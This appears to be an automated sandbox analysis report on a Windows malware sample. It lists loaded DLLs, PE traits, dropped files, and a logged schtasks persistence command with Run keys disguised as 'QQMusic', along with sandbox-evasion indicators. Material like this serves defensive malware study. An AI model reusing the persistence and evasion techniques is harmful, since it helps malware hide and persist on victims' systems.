Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: x00zm3KVwb.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: x00zm3KVwb.exe

Static file information: File size 9402368 > 1048576

Source: x00zm3KVwb.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2b8e00
Source: x00zm3KVwb.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x53aa00

Source: x00zm3KVwb.exe	Static PE information: More than 200 imports for KERNEL32.dll
Source: x00zm3KVwb.exe	Static PE information: More than 200 imports for USER32.dll

Source: x00zm3KVwb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: x00zm3KVwb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: x00zm3KVwb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: x00zm3KVwb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: x00zm3KVwb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: x00zm3KVwb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: x00zm3KVwb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: x00zm3KVwb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SMB.exe.0.dr

Source: x00zm3KVwb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: x00zm3KVwb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: x00zm3KVwb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: x00zm3KVwb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: x00zm3KVwb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: x00zm3KVwb.exe	Static PE information: section name: .giats
Source: spread.txt.0.dr	Static PE information: section name: .giats

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\X64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\spread.txt	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\SMB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\X86.dll	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\syabcd.exe	Jump to dropped file

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\X64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\spread.txt	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\SMB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\X86.dll	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	File created: C:\ProgramData\syabcd.exe	Jump to dropped file

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

File created: C:\ProgramData\spread.txt

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run QQMusic	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run QQMusic	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QQMusic	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QQMusic	Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: x00zm3KVwb.exe, spread.txt.0.dr	Binary or memory string: DIR_WATCH.DLL
Source: x00zm3KVwb.exe, spread.txt.0.dr	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

File opened / queried: VBoxMiniRdrDN

Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

Thread delayed: delay time: 18000000

Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Window / User API: threadDelayed 839			Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Window / User API: foregroundWindowGot 1688			Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Dropped PE file which has not been started: C:\ProgramData\X64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Dropped PE file which has not been started: C:\ProgramData\SMB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Dropped PE file which has not been started: C:\ProgramData\X86.dll	Jump to dropped file

Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2640	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 3184	Thread sleep count: 839 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 1772	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 1772	Thread sleep time: -870000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2124	Thread sleep count: 71 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2124	Thread sleep time: -1278000000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 3448	Thread sleep count: 88 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 1124	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 1124	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2640	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 1252	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 57 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 66 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 6764	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2232	Thread sleep count: 100 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 89 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5780	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2232	Thread sleep count: 84 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 176 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2232	Thread sleep count: 47 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 2232	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 6056	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 164 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 6056	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe TID: 5576	Thread sleep count: 87 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Thread delayed: delay time: 60000			Jump to behavior
